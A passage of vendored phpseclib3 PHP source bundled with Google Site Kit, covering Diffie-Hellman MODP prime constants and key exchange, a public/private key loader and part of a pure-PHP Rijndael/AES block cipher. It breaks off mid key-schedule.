http://tools.ietf.org/html/rfc2412, appendex E case 'diffie-hellman-group1-sha1': $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF'; break; // see http://tools.ietf.org/html/rfc3526#section-3 case 'diffie-hellman-group14-sha1': // 2048-bit MODP Group case 'diffie-hellman-group14-sha256': $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-4 case 'diffie-hellman-group15-sha512': // 3072-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-5 case 'diffie-hellman-group16-sha512': // 4096-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-6 case 'diffie-hellman-group17-sha512': // 6144-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026' . 'C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AE' . 'B06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B' . 'DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92EC' . 'F032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E' . '59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA' . 'CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76' . 'F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468' . '043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF'; break; // see https://tools.ietf.org/html/rfc3526#section-7 case 'diffie-hellman-group18-sha512': // 8192-bit MODP Group $prime = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74' . '020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437' . '4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED' . 'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05' . '98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB' . '9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B' . 'E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718' . '3995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33' . 'A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7' . 'ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864' . 'D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E2' . '08E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D7' . '88719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8' . 'DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2' . '233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA9' . '93B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026' . 'C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AE' . 'B06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B' . 'DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92EC' . 'F032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E' . '59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AA' . 'CC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76' . 'F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468' . '043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E4' . '38777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED' . '2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652D' . 'E3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B' . '4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A6' . '6D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851D' . 'F9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F92' . '4009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA' . '9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF'; break; default: throw new \InvalidArgumentException('Invalid named prime provided'); } $params->prime = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($prime, 16); $params->base = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2); return $params; } /** * Create public / private key pair. * * The rationale for the second parameter is described in http://tools.ietf.org/html/rfc4419#section-6.2 : * * "To increase the speed of the key exchange, both client and server may * reduce the size of their private exponents. It should be at least * twice as long as the key material that is generated from the shared * secret. For more details, see the paper by van Oorschot and Wiener * [VAN-OORSCHOT]." * * $length is in bits * * @param Parameters $params * @param int $length optional * @return PrivateKey */ public static function createKey(\Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Parameters $params, $length = 0) { $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createKey() should not be called from final classes (' . static::class . ')'); } $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); if ($length) { $max = $one->bitwise_leftShift($length); $max = $max->subtract($one); } else { $max = $params->prime->subtract($one); } $key = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PrivateKey(); $key->prime = $params->prime; $key->base = $params->base; $key->privateKey = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::randomRange($one, $max); $key->publicKey = $key->base->powMod($key->privateKey, $key->prime); return $key; } /** * Compute Shared Secret * * @param PrivateKey|EC $private * @param PublicKey|BigInteger|string $public * @return mixed */ public static function computeSecret($private, $public) { if ($private instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PrivateKey) { // DH\PrivateKey switch (\true) { case $public instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PublicKey: if (!$private->prime->equals($public->prime) || !$private->base->equals($public->base)) { throw new \InvalidArgumentException('The public and private key do not share the same prime and / or base numbers'); } return $public->publicKey->powMod($private->privateKey, $private->prime)->toBytes(\true); case \is_string($public): $public = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($public, -256); // fall-through case $public instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger: return $public->powMod($private->privateKey, $private->prime)->toBytes(\true); default: throw new \InvalidArgumentException('$public needs to be an instance of DH\\PublicKey, a BigInteger or a string'); } } if ($private instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PrivateKey) { switch (\true) { case $public instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\PublicKey: $public = $public->getEncodedCoordinates(); // fall-through case \is_string($public): $point = $private->multiply($public); switch ($private->getCurve()) { case 'Curve25519': case 'Curve448': $secret = $point; break; default: // according to https://www.secg.org/sec1-v2.pdf#page=33 only X is returned $secret = \substr($point, 1, \strlen($point) - 1 >> 1); } /* if (($secret[0] & "\x80") === "\x80") { $secret = "\0$secret"; } */ return $secret; default: throw new \InvalidArgumentException('$public needs to be an instance of EC\\PublicKey or a string (an encoded coordinate)'); } } } /** * Load the key * * @param string $key * @param string $password optional * @return AsymmetricKey */ public static function load($key, $password = \false) { try { return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::load($key, $password); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException $e) { } return parent::load($key, $password); } /** * OnLoad Handler * * @return bool */ protected static function onLoad(array $components) { if (!isset($components['privateKey']) && !isset($components['publicKey'])) { $new = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\Parameters(); } else { $new = isset($components['privateKey']) ? new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PrivateKey() : new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH\PublicKey(); } $new->prime = $components['prime']; $new->base = $components['base']; if (isset($components['privateKey'])) { $new->privateKey = $components['privateKey']; } if (isset($components['publicKey'])) { $new->publicKey = $components['publicKey']; } return $new; } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('DH does not use a hash algorithm'); } /** * Returns the hash algorithm currently being used * */ public function getHash() { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedOperationException('DH does not use a hash algorithm'); } /** * Returns the parameters * * A public / private key is only returned if the currently loaded "key" contains an x or y * value. * * @see self::getPublicKey() * @return mixed */ public function getParameters() { $type = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::validatePlugin('Keys', 'PKCS1', 'saveParameters'); $key = $type::saveParameters($this->prime, $this->base); return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DH::load($key, 'PKCS1'); } } <?php /** * PublicKeyLoader * * Returns a PublicKey or PrivateKey object. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException; use Google\Site_Kit_Dependencies\phpseclib3\File\X509; /** * PublicKeyLoader * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PublicKeyLoader { /** * Loads a public or private key * * @return AsymmetricKey * @param string|array $key * @param string $password optional */ public static function load($key, $password = \false) { try { return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC::load($key, $password); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException $e) { } try { return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA::load($key, $password); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException $e) { } try { return \Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA::load($key, $password); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException $e) { } try { $x509 = new \Google\Site_Kit_Dependencies\phpseclib3\File\X509(); $x509->loadX509($key); $key = $x509->getPublicKey(); if ($key) { return $key; } } catch (\Exception $e) { } throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('Unable to read key'); } /** * Loads a private key * * @return PrivateKey * @param string|array $key * @param string $password optional */ public static function loadPrivateKey($key, $password = \false) { $key = self::load($key, $password); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string|array $key */ public static function loadPublicKey($key) { $key = self::load($key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string|array $key */ public static function loadParameters($key) { $key = self::load($key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey && !$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } } <?php /** * Pure-PHP implementation of Rijndael. * * Uses mcrypt, if available/possible, and an internal implementation, otherwise. * * PHP version 5 * * If {@link self::setBlockLength() setBlockLength()} isn't called, it'll be assumed to be 128 bits. If * {@link self::setKeyLength() setKeyLength()} isn't called, it'll be calculated from * {@link self::setKey() setKey()}. ie. if the key is 128-bits, the key length will be 128-bits. If it's * 136-bits it'll be null-padded to 192-bits and 192 bits will be the key length until * {@link self::setKey() setKey()} is called, again, at which point, it'll be recalculated. * * Not all Rijndael implementations may support 160-bits or 224-bits as the block length / key length. mcrypt, for example, * does not. AES, itself, only supports block lengths of 128 and key lengths of 128, 192, and 256. * {@link http://csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf#page=10 Rijndael-ammended.pdf#page=10} defines the * algorithm for block lengths of 192 and 256 but not for block lengths / key lengths of 160 and 224. Indeed, 160 and 224 * are first defined as valid key / block lengths in * {@link http://csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf#page=44 Rijndael-ammended.pdf#page=44}: * Extensions: Other block and Cipher Key lengths. * Note: Use of 160/224-bit Keys must be explicitly set by setKeyLength(160) respectively setKeyLength(224). * * {@internal The variable names are the same as those in * {@link http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdf#page=10 fips-197.pdf#page=10}.}} * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $rijndael = new \phpseclib3\Crypt\Rijndael('ctr'); * * $rijndael->setKey('abcdefghijklmnop'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $rijndael->decrypt($rijndael->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2008 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InconsistentSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of Rijndael. * * @author Jim Wigginton <terrafrost@php.net> */ class Rijndael extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher { /** * The mcrypt specific name of the cipher * * Mcrypt is useable for 128/192/256-bit $block_size/$key_length. For 160/224 not. * \phpseclib3\Crypt\Rijndael determines automatically whether mcrypt is useable * or not for the current $block_size/$key_length. * In case of, $cipher_name_mcrypt will be set dynamically at run time accordingly. * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @see \phpseclib3\Crypt\Common\SymmetricKey::engine * @see self::isValidEngine() * @var string */ protected $cipher_name_mcrypt = 'rijndael-128'; /** * The Key Schedule * * @see self::setup() * @var array */ private $w; /** * The Inverse Key Schedule * * @see self::setup() * @var array */ private $dw; /** * The Block Length divided by 32 * * {@internal The max value is 256 / 32 = 8, the min value is 128 / 32 = 4. Exists in conjunction with $block_size * because the encryption / decryption / key schedule creation requires this number and not $block_size. We could * derive this from $block_size or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see self::setBlockLength() * @var int */ private $Nb = 4; /** * The Key Length (in bytes) * * {@internal The max value is 256 / 8 = 32, the min value is 128 / 8 = 16. Exists in conjunction with $Nk * because the encryption / decryption / key schedule creation requires this number and not $key_length. We could * derive this from $key_length or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see self::setKeyLength() * @var int */ protected $key_length = 16; /** * The Key Length divided by 32 * * @see self::setKeyLength() * @var int * @internal The max value is 256 / 32 = 8, the min value is 128 / 32 = 4 */ private $Nk = 4; /** * The Number of Rounds * * {@internal The max value is 14, the min value is 10.} * * @var int */ private $Nr; /** * Shift offsets * * @var array */ private $c; /** * Holds the last used key- and block_size information * * @var array */ private $kl; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Sets the key length. * * Valid key lengths are 128, 160, 192, 224, and 256. * * Note: phpseclib extends Rijndael (and AES) for using 160- and 224-bit keys but they are officially not defined * and the most (if not all) implementations are not able using 160/224-bit keys but round/pad them up to * 192/256 bits as, for example, mcrypt will do. * * That said, if you want be compatible with other Rijndael and AES implementations, * you should not setKeyLength(160) or setKeyLength(224). * * Additional: In case of 160- and 224-bit keys, phpseclib will/can, for that reason, not use * the mcrypt php extension, even if available. * This results then in slower encryption. * * @throws \LengthException if the key length is invalid * @param int $length */ public function setKeyLength($length) { switch ($length) { case 128: case 160: case 192: case 224: case 256: $this->key_length = $length >> 3; break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128, 160, 192, 224 or 256 bits are supported'); } parent::setKeyLength($length); } /** * Sets the key. * * Rijndael supports five different key lengths * * @see setKeyLength() * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (\strlen($key)) { case 16: case 20: case 24: case 28: case 32: break; default: throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes 16, 20, 24, 28 or 32 are supported'); } parent::setKey($key); } /** * Sets the block length * * Valid block lengths are 128, 160, 192, 224, and 256. * * @param int $length */ public function setBlockLength($length) { switch ($length) { case 128: case 160: case 192: case 224: case 256: break; default: throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes 128, 160, 192, 224 or 256 bits are supported'); } $this->Nb = $length >> 5; $this->block_size = $length >> 3; $this->changed = $this->nonIVChanged = \true; $this->setEngine(); } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_LIBSODIUM: return \function_exists('sodium_crypto_aead_aes256gcm_is_available') && \sodium_crypto_aead_aes256gcm_is_available() && $this->mode == self::MODE_GCM && $this->key_length == 32 && $this->nonce && \strlen($this->nonce) == 12 && $this->block_size == 16; case self::ENGINE_OPENSSL_GCM: if (!\extension_loaded('openssl')) { return \false; } $methods = \openssl_get_cipher_methods(); return $this->mode == self::MODE_GCM && \version_compare(\PHP_VERSION, '7.1.0', '>=') && \in_array('aes-' . $this->getKeyLength() . '-gcm', $methods) && $this->block_size == 16; case self::ENGINE_OPENSSL: if ($this->block_size != 16) { return \false; } $this->cipher_name_openssl_ecb = 'aes-' . ($this->key_length << 3) . '-ecb'; $this->cipher_name_openssl = 'aes-' . ($this->key_length << 3) . '-' . $this->openssl_translate_mode(); break; case self::ENGINE_MCRYPT: $this->cipher_name_mcrypt = 'rijndael-' . ($this->block_size << 3); if ($this->key_length % 8) { // is it a 160/224-bit key? // mcrypt is not usable for them, only for 128/192/256-bit keys return \false; } } return parent::isValidEngineHelper($engine); } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { static $tables; if (empty($tables)) { $tables =& $this->getTables(); } $t0 = $tables[0]; $t1 = $tables[1]; $t2 = $tables[2]; $t3 = $tables[3]; $sbox = $tables[4]; $state = []; $words = \unpack('N*', $in); $c = $this->c; $w = $this->w; $Nb = $this->Nb; $Nr = $this->Nr; // addRoundKey $wc = $Nb - 1; foreach ($words as $word) { $state[] = $word ^ $w[++$wc]; } // fips-197.pdf#page=19, "Figure 5. Pseudo Code for the Cipher", states that this loop has four components - // subBytes, shiftRows, mixColumns, and addRoundKey. fips-197.pdf#page=30, "Implementation Suggestions Regarding // Various Platforms" suggests that performs enhanced implementations are described in Rijndael-ammended.pdf. // Rijndael-ammended.pdf#page=20, "Implementation aspects / 32-bit processor", discusses such an optimization. // Unfortunately, the description given there is not quite correct. Per aes.spec.v316.pdf#page=19 [1], // equation (7.4.7) is supposed to use addition instead of subtraction, so we'll do that here, as well. // [1] http://fp.gladman.plus.com/cryptography_technology/rijndael/aes.spec.v316.pdf $temp = []; for ($round = 1; $round < $Nr; ++$round) { $i = 0; // $c[0] == 0 $j = $c[1]; $k = $c[2]; $l = $c[3]; while ($i < $Nb) { $temp[$i] = $t0[$state[$i] >> 24 & 0xff] ^ $t1[$state[$j] >> 16 & 0xff] ^ $t2[$state[$k] >> 8 & 0xff] ^ $t3[$state[$l] & 0xff] ^ $w[++$wc]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } $state = $temp; } // subWord for ($i = 0; $i < $Nb; ++$i) { $state[$i] = $sbox[$state[$i] & 0xff] | $sbox[$state[$i] >> 8 & 0xff] << 8 | $sbox[$state[$i] >> 16 & 0xff] << 16 | $sbox[$state[$i] >> 24 & 0xff] << 24; } // shiftRows + addRoundKey $i = 0; // $c[0] == 0 $j = $c[1]; $k = $c[2]; $l = $c[3]; while ($i < $Nb) { $temp[$i] = $state[$i] & \intval(0xff000000) ^ $state[$j] & 0xff0000 ^ $state[$k] & 0xff00 ^ $state[$l] & 0xff ^ $w[$i]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } return \pack('N*', ...$temp); } /** * Decrypts a block * * @param string $in * @return string */ protected function decryptBlock($in) { static $invtables; if (empty($invtables)) { $invtables =& $this->getInvTables(); } $dt0 = $invtables[0]; $dt1 = $invtables[1]; $dt2 = $invtables[2]; $dt3 = $invtables[3]; $isbox = $invtables[4]; $state = []; $words = \unpack('N*', $in); $c = $this->c; $dw = $this->dw; $Nb = $this->Nb; $Nr = $this->Nr; // addRoundKey $wc = $Nb - 1; foreach ($words as $word) { $state[] = $word ^ $dw[++$wc]; } $temp = []; for ($round = $Nr - 1; $round > 0; --$round) { $i = 0; // $c[0] == 0 $j = $Nb - $c[1]; $k = $Nb - $c[2]; $l = $Nb - $c[3]; while ($i < $Nb) { $temp[$i] = $dt0[$state[$i] >> 24 & 0xff] ^ $dt1[$state[$j] >> 16 & 0xff] ^ $dt2[$state[$k] >> 8 & 0xff] ^ $dt3[$state[$l] & 0xff] ^ $dw[++$wc]; ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } $state = $temp; } // invShiftRows + invSubWord + addRoundKey $i = 0; // $c[0] == 0 $j = $Nb - $c[1]; $k = $Nb - $c[2]; $l = $Nb - $c[3]; while ($i < $Nb) { $word = $state[$i] & \intval(0xff000000) | $state[$j] & 0xff0000 | $state[$k] & 0xff00 | $state[$l] & 0xff; $temp[$i] = $dw[$i] ^ ($isbox[$word & 0xff] | $isbox[$word >> 8 & 0xff] << 8 | $isbox[$word >> 16 & 0xff] << 16 | $isbox[$word >> 24 & 0xff] << 24); ++$i; $j = ($j + 1) % $Nb; $k = ($k + 1) % $Nb; $l = ($l + 1) % $Nb; } return \pack('N*', ...$temp); } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine and flush all $buffers * Used (only) if $engine == self::ENGINE_INTERNAL * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setIV() * * - disableContinuousBuffer() * * - First run of encrypt() / decrypt() with no init-settings * * {@internal setup() is always called before en/decryption.} * * {@internal Could, but not must, extend by the child Crypt_* class} * * @see self::setKey() * @see self::setIV() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } parent::setup(); if (\is_string($this->iv) && \strlen($this->iv) != $this->block_size) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InconsistentSetupException('The IV length (' . \strlen($this->iv) . ') does not match the block size (' . $this->block_size . ')'); } } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { // Each number in $rcon is equal to the previous number multiplied by two in Rijndael's finite field. // See http://en.wikipedia.org/wiki/Finite_field_arithmetic#Multiplicative_inverse static $rcon; if (!isset($rcon)) { $rcon = [0, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x1b000000, 0x36000000, 0x6c000000, 0xd8000000, 